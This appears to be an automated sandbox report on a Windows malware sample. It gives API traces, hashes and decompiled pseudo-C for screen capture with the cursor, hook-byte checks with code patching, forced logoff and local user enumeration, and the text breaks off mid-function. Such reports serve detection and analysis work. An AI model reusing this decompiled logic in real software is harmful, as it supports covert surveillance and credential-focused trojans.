Part of subcall function 00412D30: GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 00412E78
Part of subcall function 00412D30: GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 00412E8A
Part of subcall function 00412D30: GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 00412E9C
Part of subcall function 00412D30: GetProcAddress.KERNEL32(LdrLoadDll), ref: 00412EAE
Part of subcall function 00412D30: GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 00412EC0

SetErrorMode.KERNEL32(00008007,00000000), ref: 00413CDE
GetCommandLineW.KERNEL32(?), ref: 00413CE8
CommandLineToArgvW.SHELL32(00000000), ref: 00413CEF
LocalFree.KERNEL32(00000000), ref: 00413D44
Sleep.KERNEL32(000000FF,?,00000001), ref: 00413D9A
ExitProcess.KERNEL32 ref: 00413DAB

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$CommandHandleLineModule$ArgvErrorExitFreeLocalModeProcessSleep
String ID:
API String ID: 1184560534-0
Opcode ID: 6006af1fb8caaa1f2bf40058cba84c4ec48fe1e2af7cf33988bd6f667ad6e11f
Instruction ID: 6490d8834e17bbd889de1c0184e76a29c14593038c0ae40773f2a52d0e1e8666
Opcode Fuzzy Hash: 6006af1fb8caaa1f2bf40058cba84c4ec48fe1e2af7cf33988bd6f667ad6e11f
Instruction Fuzzy Hash: DC2129B09442C499CB146FB5EA183EE3BA46F0230BF18449FE0526A2A2C77D4BC5C71E

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040BC07, Relevance: 82.6, APIs: 27, Strings: 20, Instructions: 389
libraryloaderwindowCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E0040BC07(WCHAR* _a4, char _a8, signed short _a12) {
				struct HINSTANCE__* _v12;
				struct HINSTANCE__* _v16;
				struct HINSTANCE__* _v20;
				_Unknown_base(*)()* _v24;
				void* _v28;
				void* _v32;
				struct HDC__* _v36;
				_Unknown_base(*)()* _v40;
				_Unknown_base(*)()* _v44;
				struct tagPOINT _v52;
				_Unknown_base(*)()* _v56;
				struct HINSTANCE__* _v60;
				_Unknown_base(*)()* _v64;
				_Unknown_base(*)()* _v68;
				_Unknown_base(*)()* _v72;
				_Unknown_base(*)()* _v76;
				_Unknown_base(*)()* _v80;
				_Unknown_base(*)()* _v84;
				_Unknown_base(*)()* _v88;
				struct HINSTANCE__* _v92;
				struct HINSTANCE__* _v96;
				struct HINSTANCE__* _v100;
				char _v104;
				_Unknown_base(*)()* _v108;
				intOrPtr _v112;
				char _v116;
				_Unknown_base(*)()* _v120;
				char _v148;
				signed int _v152;
				struct _ICONINFO _v172;
				char _v188;
				struct HINSTANCE__* _t169;
				_Unknown_base(*)()* _t176;
				struct HINSTANCE__* _t181;
				_Unknown_base(*)()* _t182;
				struct HINSTANCE__* _t183;
				_Unknown_base(*)()* _t191;
				struct HDC__* _t197;
				struct HICON__* _t199;
				signed int _t200;
				intOrPtr _t202;
				intOrPtr _t204;
				void* _t206;
				void* _t223;
				intOrPtr* _t224;
				void* _t239;
				void* _t248;
				unsigned int _t260;
				intOrPtr* _t262;
				signed short _t263;
				intOrPtr _t264;
				WCHAR** _t265;
				intOrPtr _t268;
				signed int _t269;
				signed int _t272;
				void* _t275;

				_v32 = 0;
				_v60 = 0;
				_v16 = 0;
				_v104 = 1;
				_v100 = 0;
				_v96 = 0;
				_v92 = 0;
				_t169 = LoadLibraryA("gdiplus.dll");
				_v20 = _t169;
				_v24 = GetProcAddress(_t169, "GdiplusStartup");
				_v80 = GetProcAddress(_v20, "GdiplusShutdown");
				_v88 = GetProcAddress(_v20, "GdipCreateBitmapFromHBITMAP");
				_v72 = GetProcAddress(_v20, "GdipDisposeImage");
				_v40 = GetProcAddress(_v20, "GdipGetImageEncodersSize");
				_v64 = GetProcAddress(_v20, "GdipGetImageEncoders");
				_t176 = GetProcAddress(_v20, "GdipSaveImageToStream");
				_v108 = _t176;
				if(_v24 == 0 || _v80 == 0 || _v88 == 0 || _v72 == 0 || _v40 == 0 || _v64 == 0 || _t176 == 0) {
					L66:
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
					if(_v60 != 0) {
						FreeLibrary(_v60);
					}
					if(_v16 != 0) {
						FreeLibrary(_v16);
					}
					return _v32;
				} else {
					_t181 = LoadLibraryA("ole32.dll");
					_v60 = _t181;
					_t182 = GetProcAddress(_t181, "CreateStreamOnHGlobal");
					_v120 = _t182;
					if(_t182 == 0) {
						goto L66;
					}
					_t183 = LoadLibraryA("gdi32.dll");
					_v16 = _t183;
					_t262 = GetProcAddress(_t183, "CreateDCW");
					_v12 = GetProcAddress(_v16, "CreateCompatibleDC");
					_v44 = GetProcAddress(_v16, "CreateCompatibleBitmap");
					_v28 = GetProcAddress(_v16, "GetDeviceCaps");
					_v56 = GetProcAddress(_v16, "SelectObject");
					_v76 = GetProcAddress(_v16, "BitBlt");
					_v84 = GetProcAddress(_v16, "DeleteObject");
					_t191 = GetProcAddress(_v16, "DeleteDC");
					_v68 = _t191;
					if(_t262 == 0 || _v12 == 0 || _v44 == 0 || _v28 == 0 || _v56 == 0 || _v76 == 0 || _v84 == 0 || _t191 == 0) {
						goto L66;
					} else {
						_push(0);
						_push( &_v104);
						_push( &_v116);
						_v104 = 1;
						_v100 = 0;
						_v96 = 0;
						_v92 = 0;
						if(_v24() != 0) {
							goto L66;
						}
						_t268 =  *_t262(L"DISPLAY", 0, 0, 0);
						_v24 = _t268;
						if(_t268 == 0) {
							L65:
							_v80(_v116);
							goto L66;
						}
						_t197 = _v12(_t268);
						_v36 = _t197;
						if(_t197 == 0) {
							L64:
							_v68(_v24);
							goto L65;
						}
						_t199 = LoadImageW(0, 0x7f00, 2, 0, 0, 0x8040);
						_v12 = _t199;
						if(_t199 == 0) {
							L24:
							_t263 = 0;
							goto L26;
						} else {
							if(GetIconInfo(_t199,  &_v172) == 0 || GetCursorPos( &_v52) == 0) {
								_v12 = 0;
							}
							if(_v12 != 0) {
								_t263 = _a12;
								L26:
								if(_t263 == 0) {
									_t200 = _v28(_t268, 8);
									_t269 = _t200;
									_a12 = _v28(_v24, 0xa);
								} else {
									_t269 = _t263 & 0x0000ffff;
									_a12 = _t269;
								}
								_t202 = _v44(_v24, _t269, _a12);
								_v44 = _t202;
								if(_t202 == 0) {
									L63:
									_v68(_v36);
									goto L64;
								} else {
									_t204 = _v56(_v36, _t202);
									_v112 = _t204;
									if(_t204 == 0) {
										L62:
										_v84(_v44);
										goto L63;
									}
									_t206 = 0;
									_t248 = 0;
									if(_t263 != 0) {
										_t260 = (_t263 & 0x0000ffff) >> 1;
										_t206 =  <  ? 0 : _v52.x - _t260;
										_t248 =  <  ? 0 : _v52.y - _t260;
										_t81 =  &_v52;
										 *_t81 = _v52.x - _t206;
										if( *_t81 < 0) {
											_v52.x = 0;
										}
										_t84 =  &(_v52.y);
										 *_t84 = _v52.y - _t248;
										if( *_t84 < 0) {
											_v52.y = 0;
										}
									}
									_push(0x40cc0020);
									_push(_t248);
									_push(_t206);
									_push(_v24);
									_push(_a12);
									_push(_t269);
									_push(0);
									_push(0);
									_push(_v36);
									if(_v76() == 0) {
										L61:
										_v56(_v36, _v112);
										goto L62;
									} else {
										if(_v12 != 0) {
											_t254 =  <  ? 0 : _v52.x - _v172.xHotspot;
											_t239 = _v52.y - _v172.yHotspot;
											_t240 =  <  ? 0 : _t239;
											DrawIcon(_v36,  <  ? 0 : _v52.x - _v172.xHotspot,  <  ? 0 : _t239, _v12);
										}
										_push( &_v12);
										_push(0);
										_push(_v44);
										_v12 = 0;
										if(_v88() != 0 || _v12 == 0) {
											goto L61;
										} else {
											_push( &_v28);
											_push( &_a12);
											_a12 = 0;
											_v28 = 0;
											if(_v40() != 0) {
												L60:
												_v72(_v12);
												goto L61;
											}
											_t215 = _v28;
											if(_v28 == 0 || _a12 == 0) {
												goto L60;
											} else {
												_t264 = E0040C192(_t215);
												_v40 = _t264;
												if(_t264 == 0) {
													goto L60;
												}
												_push(_t264);
												_push(_v28);
												_push(_a12);
												if(_v64() != 0) {
													L52:
													E0040C1C2(_v40);
													if(_a12 == 0) {
														_push( &_v32);
														_push(1);
														_push(0);
														if(_v120() == 0 && _v32 != 0) {
															_v152 = 0;
															if(_a8 > 0) {
																E0040C1FE( &_v148, 0x401808, 0x10);
																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x7c)) = 4;
																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x80)) = 1;
																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x78)) =  &_a8;
																_v152 = _v152 + 1;
															}
															_t223 = _v108(_v12, _v32,  &_v188,  &_v152);
															_t224 = _v32;
															if(_t223 == 0) {
																 *((intOrPtr*)( *_t224 + 0x14))(_t224, 0, 0, 0, 0);
															} else {
																 *((intOrPtr*)( *_t224 + 8))(_t224);
																_v32 = 0;
															}
														}
													}
													goto L60;
												}
												_t272 = 0;
												if(_a12 <= 0) {
													goto L52;
												}
												_t265 = _t264 + 0x30;
												while(lstrcmpiW(_a4,  *_t265) != 0) {
													_t272 = _t272 + 1;
													_t265 =  &(_t265[0x13]);
													if(_t272 < _a12) {
														continue;
													}
													goto L52;
												}
												E0040C1FE( &_v188, _t272 * 0x4c + _v40, 0x10);
												_a12 = 0;
												goto L52;
											}
										}
									}
								}
							}
							goto L24;
						}
					}
				}
			}

0x0040bc20
0x0040bc23
0x0040bc26
0x0040bc29
0x0040bc30
0x0040bc33
0x0040bc36
0x0040bc39
0x0040bc47
0x0040bc54
0x0040bc61
0x0040bc6e
0x0040bc7b
0x0040bc88
0x0040bc95
0x0040bc98
0x0040bc9a
0x0040bca0
0x0040c084
0x0040c08d
0x0040c092
0x0040c092
0x0040c097
0x0040c09c
0x0040c09c
0x0040c0a1
0x0040c0a6
0x0040c0a6
0x0040c0af
0x0040bcdb
0x0040bce0
0x0040bce8
0x0040bceb
0x0040bced
0x0040bcf2
0x00000000
0x00000000
0x0040bcfd
0x0040bd05
0x0040bd12
0x0040bd1e
0x0040bd2b
0x0040bd38
0x0040bd45
0x0040bd52
0x0040bd5f
0x0040bd62
0x0040bd64
0x0040bd69
0x00000000
0x0040bdad
0x0040bdad
0x0040bdb1
0x0040bdb5
0x0040bdb6
0x0040bdbd
0x0040bdc0
0x0040bdc3
0x0040bdcb
0x00000000
0x00000000
0x0040bddb
0x0040bddd
0x0040bde2
0x0040c07e
0x0040c081
0x00000000
0x0040c081
0x0040bde9
0x0040bdec
0x0040bdf1
0x0040c078
0x0040c07b
0x00000000
0x0040c07b
0x0040be06
0x0040be0c
0x0040be11
0x0040be3b
0x0040be3b
0x00000000
0x0040be13
0x0040be23
0x0040be33
0x0040be33
0x0040be39
0x0040be3f
0x0040be42
0x0040be45
0x0040be52
0x0040be5a
0x0040be5f
0x0040be47
0x0040be47
0x0040be4a
0x0040be4a
0x0040be69
0x0040be6c
0x0040be71
0x0040c072
0x0040c075
0x00000000
0x0040be77
0x0040be7b
0x0040be7e
0x0040be83
0x0040c06c
0x0040c06f
0x00000000
0x0040c06f
0x0040be89
0x0040be8b
0x0040be90
0x0040be9b
0x0040be9f
0x0040bea4
0x0040bea7
0x0040bea7
0x0040beaa
0x0040beac
0x0040beac
0x0040beaf
0x0040beaf
0x0040beb2
0x0040beb4
0x0040beb4
0x0040beb2
0x0040beb7
0x0040bebc
0x0040bebd
0x0040bebe
0x0040bec1
0x0040bec4
0x0040bec5
0x0040bec6
0x0040bec7
0x0040becf
0x0040c063
0x0040c069
0x00000000
0x0040bed5
0x0040bed8
0x0040bee9
0x0040beec
0x0040bef2
0x0040befa
0x0040befa
0x0040bf03
0x0040bf04
0x0040bf05
0x0040bf08
0x0040bf10
0x00000000
0x0040bf1f
0x0040bf22
0x0040bf26
0x0040bf27
0x0040bf2a
0x0040bf32
0x0040c05d
0x0040c060
0x00000000
0x0040c060
0x0040bf38
0x0040bf3d
0x00000000
0x0040bf4c
0x0040bf51
0x0040bf53
0x0040bf58
0x00000000
0x00000000
0x0040bf5e
0x0040bf5f
0x0040bf62
0x0040bf6a
0x0040bfa8
0x0040bfab
0x0040bfb3
0x0040bfbc
0x0040bfc0
0x0040bfc1
0x0040bfc7
0x0040bfd6
0x0040bfdf
0x0040bfef
0x0040bffd
0x0040c00e
0x0040c01e
0x0040c022
0x0040c022
0x0040c03c
0x0040c041
0x0040c044
0x0040c05a
0x0040c046
0x0040c049
0x0040c04c
0x0040c04c
0x0040c044
0x0040bfc7
0x00000000
0x0040bfb3
0x0040bf6c
0x0040bf71
0x00000000
0x00000000
0x0040bf73
0x0040bf76
0x0040bf85
0x0040bf86
0x0040bf8c
0x00000000
0x00000000
0x00000000
0x0040bf8e
0x0040bfa0
0x0040bfa5
0x00000000
0x0040bfa5
0x0040bf3d
0x0040bf10
0x0040becf
0x0040be71
0x00000000
0x0040be39
0x0040be11
0x0040bd69

APIs

LoadLibraryA.KERNEL32(gdiplus.dll,?,?,?), ref: 0040BC39
GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0040BC4A
GetProcAddress.KERNEL32(000001F4,GdiplusShutdown), ref: 0040BC57
GetProcAddress.KERNEL32(000001F4,GdipCreateBitmapFromHBITMAP), ref: 0040BC64
GetProcAddress.KERNEL32(000001F4,GdipDisposeImage), ref: 0040BC71
GetProcAddress.KERNEL32(000001F4,GdipGetImageEncodersSize), ref: 0040BC7E
GetProcAddress.KERNEL32(000001F4,GdipGetImageEncoders), ref: 0040BC8B
GetProcAddress.KERNEL32(000001F4,GdipSaveImageToStream), ref: 0040BC98
LoadLibraryA.KERNEL32(ole32.dll,?,?,?), ref: 0040BCE0
GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0040BCEB
LoadLibraryA.KERNEL32(gdi32.dll,?,?,?), ref: 0040BCFD
GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0040BD08
GetProcAddress.KERNEL32(?,CreateCompatibleDC), ref: 0040BD14
GetProcAddress.KERNEL32(?,CreateCompatibleBitmap), ref: 0040BD21
GetProcAddress.KERNEL32(?,GetDeviceCaps), ref: 0040BD2E
GetProcAddress.KERNEL32(?,SelectObject), ref: 0040BD3B
GetProcAddress.KERNEL32(?,BitBlt), ref: 0040BD48
GetProcAddress.KERNEL32(?,DeleteObject), ref: 0040BD55
GetProcAddress.KERNEL32(?,DeleteDC), ref: 0040BD62
LoadImageW.USER32 ref: 0040BE06
GetIconInfo.USER32(00000000,?), ref: 0040BE1B
GetCursorPos.USER32(?,?,?,?), ref: 0040BE29
DrawIcon.USER32 ref: 0040BEFA
lstrcmpiW.KERNEL32(?,-00000030,?,?,?), ref: 0040BF7B
FreeLibrary.KERNEL32(000001F4,?,?,?), ref: 0040C092
FreeLibrary.KERNEL32(?,?,?,?), ref: 0040C09C
FreeLibrary.KERNEL32(?,?,?,?), ref: 0040C0A6

Strings

DISPLAY, xrefs: 0040BDD4
gdi32.dll, xrefs: 0040BCF8
CreateCompatibleDC, xrefs: 0040BD0A
CreateCompatibleBitmap, xrefs: 0040BD16
GetDeviceCaps, xrefs: 0040BD23
GdipSaveImageToStream, xrefs: 0040BC8D
GdiplusShutdown, xrefs: 0040BC4C
GdipDisposeImage, xrefs: 0040BC66
ole32.dll, xrefs: 0040BCDB
BitBlt, xrefs: 0040BD3D
DeleteDC, xrefs: 0040BD57
GdipGetImageEncodersSize, xrefs: 0040BC73
CreateStreamOnHGlobal, xrefs: 0040BCE2
GdiplusStartup, xrefs: 0040BC41
CreateDCW, xrefs: 0040BCFF
SelectObject, xrefs: 0040BD30
DeleteObject, xrefs: 0040BD4A
GdipCreateBitmapFromHBITMAP, xrefs: 0040BC59
GdipGetImageEncoders, xrefs: 0040BC80
gdiplus.dll, xrefs: 0040BC1B

Memory Dump Source

Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressProc$Library$Load$Free$Icon$CursorDrawImageInfolstrcmpi
String ID: BitBlt$CreateCompatibleBitmap$CreateCompatibleDC$CreateDCW$CreateStreamOnHGlobal$DISPLAY$DeleteDC$DeleteObject$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$GdiplusShutdown$GdiplusStartup$GetDeviceCaps$SelectObject$gdi32.dll$gdiplus.dll$ole32.dll
API String ID: 1554524784-1167942225
Opcode ID: d7ea89d9729986aa870de3a99d563870d3569629410302b83ad9d0027591cecc
Instruction ID: 55e603a521015cd6370ee3422382da327527dfc73b0936e801952f0175fbd47a
Opcode Fuzzy Hash: d7ea89d9729986aa870de3a99d563870d3569629410302b83ad9d0027591cecc
Instruction Fuzzy Hash: 93E1C471D0025AEBCF209FE5CC84AAEBAB9FF04341F14453BE615B22A0D7785945CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00413970, Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 243
synchronizationsleepshutdownCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00413970(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4, char _a8) {
				char _v536;
				char _v540;
				char _v544;
				char _v644;
				signed char _v648;
				char _v748;
				short _v760;
				char _v764;
				short _v772;
				int _v776;
				int _v780;
				void _v781;
				void* _v784;
				char _v785;
				void _v788;
				void _v789;
				void* _v792;
				char _v793;
				char _v797;
				void* _v800;
				void* _v804;
				void* _v808;
				char _v809;
				int _v813;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t74;
				int _t79;
				intOrPtr* _t80;
				int _t82;
				void* _t84;
				int _t88;
				void* _t92;
				int _t100;
				int _t108;
				void* _t113;
				int _t130;
				void* _t144;
				void* _t146;
				void* _t166;

				_t166 = __fp0;
				_t135 = __ecx;
				_t148 =  &_v764;
				_v781 = 0;
				if(E004113D7(0, __ecx,  &_v764,  *0x4238fc) != 0) {
					_v780 = _v760;
					_t130 = E004135E9( &_v780, __ecx, _v764);
					_v776 = _t130;
					if(_t130 == 0) {
						_v780 = 0;
					}
					_t71 = E0041147F( &_v764);
				}
				if(_v780 != 0x1e6) {
					__eflags = _v780 - 0xc;
					if(__eflags != 0) {
						L41:
						E0040C1C2(_v772);
						return _v785;
					}
					_t74 = E0041317B(_t135, __eflags, 0x8889347b, 2);
					_v776 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						L39:
						__eflags = _a8 - 1;
						if(_a8 == 1) {
							E0040DC27(0, _t148,  *0x4238fc);
						}
						goto L41;
					}
					E00413140(0x19367401,  &_v748, 1);
					_t79 = E0040F9A5( &_v760);
					_t148 = GetFileAttributesExW;
					__eflags = _t79;
					if(_t79 == 0) {
						L23:
						_t80 =  *0x4238a4;
						__imp__IsWellKnownSid( *_t80, 0x16);
						__eflags = _t80 - 1;
						if(__eflags != 0) {
							_v789 = 0;
							_t82 = ReadProcessMemory(0xffffffff, _t148,  &_v789, 1, 0);
							__eflags = _t82;
							if(_t82 == 0) {
								L29:
								_push( *((intOrPtr*)(_v780 + 4)));
								_t84 = E004125D7(_t135, E0040B1F7,  *((intOrPtr*)(_v780 + 8)));
								_t148 = 0x423900;
								_v797 = E0040B1F7(_t84, 0, 0x423900,  &_v540, E0040B1F7, 0x423900);
								L30:
								__eflags = _v793 - 1;
								if(_v793 == 1) {
									_t88 = E0040DA89( &_v536, 0, _t148, 0,  &_v776);
									__eflags = _t88;
									_v813 = _t88 != 0;
									__eflags = _v813;
									if(_v813 != 0) {
										E00413140(0x1a43533f,  &_v760, 1);
										_t92 = CreateEventW(0x4238d8, 1, 0,  &_v772);
										_t144 = _v788;
										_v804 = _t92;
										_v800 = _t144;
										_push(0xffffffff);
										__eflags = _t92;
										if(_t92 != 0) {
											WaitForMultipleObjects(2,  &_v792, 0, ??);
										} else {
											WaitForSingleObject(_t144, ??);
										}
										_t148 = CloseHandle;
										__eflags = _v792;
										if(_v792 != 0) {
											CloseHandle(_v792);
										}
										CloseHandle(_v772);
										CloseHandle(_t144);
									}
								}
								L38:
								E0040F995(_v780);
								goto L39;
							}
							__eflags = _v789 - 0xe9;
							if(_v789 != 0xe9) {
								goto L29;
							}
							_t100 = GetFileAttributesExW(0x423d0e, 0x78f16360,  &_v788);
							__eflags = _t100 - 1;
							if(_t100 != 1) {
								goto L29;
							}
							_push( *((intOrPtr*)(_v784 + 4)));
							E004125D7(_t135, E0040B563,  *_v784);
							_push(_a4);
							_t148 = 0x423900;
							_push( &_v544);
							_v809 = E0040B563( &_v544, 0, _v800, 0x423900, E0040B563, __eflags, _t166);
							VirtualFree(_v808, 0, 0x8000);
							goto L30;
						}
						_v789 = E0040B8C3(__eflags);
						goto L38;
					} else {
						goto L20;
					}
					while(1) {
						L20:
						_v781 = 0;
						_t108 = ReadProcessMemory(0xffffffff, _t148,  &_v781, 1, 0);
						__eflags = _t108;
						if(_t108 == 0) {
							goto L22;
						}
						__eflags = _v781 - 0xe9;
						if(_v781 == 0xe9) {
							goto L23;
						}
						L22:
						Sleep(0x1f4);
					}
				}
				if(E0040B4AC(_t71, _t135, _v772) != 0) {
					E00413140(0x32901130,  &_v748, 1);
					_t113 = CreateMutexW(0x4238d8, 1,  &_v760);
					_v792 = _t113;
					if(_t113 != 0) {
						if(GetLastError() == 0xb7) {
							CloseHandle(_v780);
							_v780 = 0;
						}
						if(_v780 != 0) {
							E00413DB2(_t135,  &_v644);
							if((_v648 & 0x00000020) != 0) {
								 *0x4238a0 =  *0x4238a0 | 0x00000010;
							}
							E0041D76E();
							if(( *0x4238a0 & 0x00000010) != 0) {
								ExitWindowsEx(0x14, 0x80000000);
							}
							E00413140(0x1a43533f,  &_v748, 1);
							_t146 = OpenEventW(2, 0,  &_v760);
							if(_t146 != 0) {
								SetEvent(_t146);
								CloseHandle(_t146);
							}
							E004136A6(1);
							_v785 = 1;
							CloseHandle(_v784);
						}
					}
				}
				goto L41;
			}

0x00413970
0x00413970
0x00413989
0x0041398d
0x00413998
0x004139a2
0x004139aa
0x004139af
0x004139b5
0x004139b7
0x004139b7
0x004139bf
0x004139bf
0x004139cc
0x00413ab8
0x00413abd
0x00413ca1
0x00413ca5
0x00413cb4
0x00413cb4
0x00413aca
0x00413acf
0x00413ad3
0x00413ad5
0x00413c90
0x00413c90
0x00413c94
0x00413c9c
0x00413c9c
0x00000000
0x00413c94
0x00413ae7
0x00413af1
0x00413af6
0x00413b02
0x00413b04
0x00413b2f
0x00413b2f
0x00413b38
0x00413b3e
0x00413b41
0x00413b5c
0x00413b60
0x00413b62
0x00413b64
0x00413bc7
0x00413bcb
0x00413bd6
0x00413bdb
0x00413bee
0x00413bf2
0x00413bf2
0x00413bf7
0x00413c0d
0x00413c12
0x00413c14
0x00413c19
0x00413c1d
0x00413c2b
0x00413c3d
0x00413c43
0x00413c47
0x00413c4b
0x00413c4f
0x00413c51
0x00413c53
0x00413c66
0x00413c55
0x00413c56
0x00413c56
0x00413c6c
0x00413c72
0x00413c76
0x00413c7c
0x00413c7c
0x00413c82
0x00413c85
0x00413c85
0x00413c1d
0x00413c87
0x00413c8b
0x00000000
0x00413c8b
0x00413b66
0x00413b6b
0x00000000
0x00000000
0x00413b7c
0x00413b7e
0x00413b81
0x00000000
0x00000000
0x00413b87
0x00413b91
0x00413b96
0x00413ba4
0x00413ba9
0x00413bbb
0x00413bbf
0x00000000
0x00413bbf
0x00413b48
0x00000000
0x00000000
0x00000000
0x00000000
0x00413b06
0x00413b06
0x00413b11
0x00413b15
0x00413b17
0x00413b19
0x00000000
0x00000000
0x00413b1b
0x00413b20
0x00000000
0x00000000
0x00413b22
0x00413b27
0x00413b27
0x00413b06
0x004139dd
0x004139ef
0x00413a00
0x00413a06
0x00413a0c
0x00413a23
0x00413a29
0x00413a2b
0x00413a2b
0x00413a33
0x00413a41
0x00413a4e
0x00413a50
0x00413a50
0x00413a57
0x00413a63
0x00413a6c
0x00413a6c
0x00413a7e
0x00413a91
0x00413a95
0x00413a98
0x00413a9f
0x00413a9f
0x00413aa3
0x00413aac
0x00413ab1
0x00413ab1
0x00413a33
0x00413a0c
0x00000000

APIs

Part of subcall function 004113D7: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,00413996,?,?,00000000), ref: 004113FC
Part of subcall function 004113D7: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00413996,?,?,00000000), ref: 0041140F

CreateMutexW.KERNEL32(004238D8,00000001,?,32901130,?,00000001,?), ref: 00413A00
GetLastError.KERNEL32 ref: 00413A12
CloseHandle.KERNEL32(000001E6), ref: 00413A29
ExitWindowsEx.USER32(00000014,80000000), ref: 00413A6C
OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001), ref: 00413A8B
SetEvent.KERNEL32(00000000), ref: 00413A98
CloseHandle.KERNEL32(00000000), ref: 00413A9F
CloseHandle.KERNEL32(000001E6,00000001), ref: 00413AB1
ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,00000002,00000001,00000000,?,19367401,?,00000001,8889347B,00000002), ref: 00413B15
Sleep.KERNEL32(000001F4), ref: 00413B27
IsWellKnownSid.ADVAPI32(?,00000016,?,19367401,?,00000001,8889347B,00000002), ref: 00413B38
ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,00000000,00000001,00000000), ref: 00413B60
VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 00413BBF
GetFileAttributesExW.KERNEL32(00423D0E,78F16360,0000000C), ref: 00413B7C

Part of subcall function 004125D7: VirtualProtect.KERNEL32(0040B1F7,?,00000040,00000000,74B5F9B0,?,?,00413BDB,?,?), ref: 004125EC
Part of subcall function 004125D7: VirtualProtect.KERNEL32(0040B1F7,?,00000000,00000000,?,?,00413BDB,?,?), ref: 0041261F

CreateEventW.KERNEL32(004238D8,00000001,00000000,?,1A43533F,?,00000001,00000001,?,00000000,00423900,00000000,?,?,?), ref: 00413C3D
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00413C56
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00413C66
CloseHandle.KERNEL32(0000000C), ref: 00413C7C
CloseHandle.KERNEL32(?), ref: 00413C82
CloseHandle.KERNEL32(?), ref: 00413C85

Strings

, xrefs: 00413A46

Memory Dump Source

Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseHandle$CreateEventFileVirtual$MemoryProcessProtectReadWait$AttributesErrorExitFreeKnownLastMultipleMutexObjectObjectsOpenSingleSizeSleepWellWindows
String ID:
API String ID: 561470431-3916222277
Opcode ID: 9f686587aebf39e2301886090d941962f8539d00b6e159b05fa2e961732afdca
Instruction ID: f03512a9ec9464bac4412028b3ee93b44b6bbae5e79496805a5ec7fdfc4ace85
Opcode Fuzzy Hash: 9f686587aebf39e2301886090d941962f8539d00b6e159b05fa2e961732afdca
Instruction Fuzzy Hash: CF91D571508385AFD710EF61CD45EAF7BE8EF84705F00092EF584A61A1D778DA88CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040B8C3, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040B8C3(void* __eflags) {
				char _v5;
				char* _v12;
				char _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				char _v56;
				char _v88;
				char _v608;
				short _v1128;
				char _v1648;
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t63;
				int _t69;
				char _t70;
				char _t76;
				int _t80;
				char _t81;
				char _t82;
				char _t86;
				char _t88;
				WCHAR* _t98;
				int _t99;
				CHAR* _t110;
				char* _t111;
				WCHAR* _t112;
				struct HINSTANCE__* _t113;
				signed int _t114;
				void* _t115;

				_t112 =  &_v56;
				_v5 = 0;
				E004128DB(0xe1, _t112);
				_t113 = LoadLibraryW(_t112);
				if(_t113 == 0) {
					L7:
					return 0;
				} else {
					_t110 =  &_v88;
					E004128A5(0xe2, _t110);
					_t63 = GetProcAddress(_t113, _t110);
					if(_t63 != 0) {
						_push( &_v12);
						_t106 =  &_v608;
						_push( &_v608);
						_v12 = 0x104;
						if( *_t63() == 1) {
							_t98 =  &_v1128;
							__imp__SHGetFolderPathW(0, 7, 0xffffffff, 1, _t98);
							if(_t98 == 0) {
								_t106 =  &_v608;
								_t99 = E0040CD11(_t106);
								_v12 = _t99;
								if(StrCmpNIW(_t106,  &_v1128, _t99) == 0) {
									_t106 = _t115 + _v12 * 2 - 0x464;
									_t109 =  &_v1128;
									E0040C563(_t102 | 0xffffffff, _t115 + _v12 * 2 - 0x464,  &_v1128);
									_v5 = 1;
								}
							}
						}
					}
					FreeLibrary(_t113);
					if(_v5 != 0) {
						_v5 = 0;
						_v28 = 0;
						_t111 = L".exe";
						do {
							_v12 = 0;
							_t69 = NetUserEnum(0, 0, 2,  &_v12, 0xffffffff,  &_v20,  &_v32,  &_v28);
							_v24 = _t69;
							__eflags = _t69;
							if(_t69 == 0) {
								L11:
								__eflags = _v12;
								if(_v12 == 0) {
									goto L24;
								}
								_t114 = 0;
								__eflags = _v20;
								if(_v20 <= 0) {
									L23:
									NetApiBufferFree(_v12);
									goto L24;
								} else {
									goto L13;
								}
								do {
									L13:
									_t80 = NetUserGetInfo(0,  *(_v12 + _t114 * 4), 0x17,  &_v16);
									__eflags = _t80;
									if(_t80 == 0) {
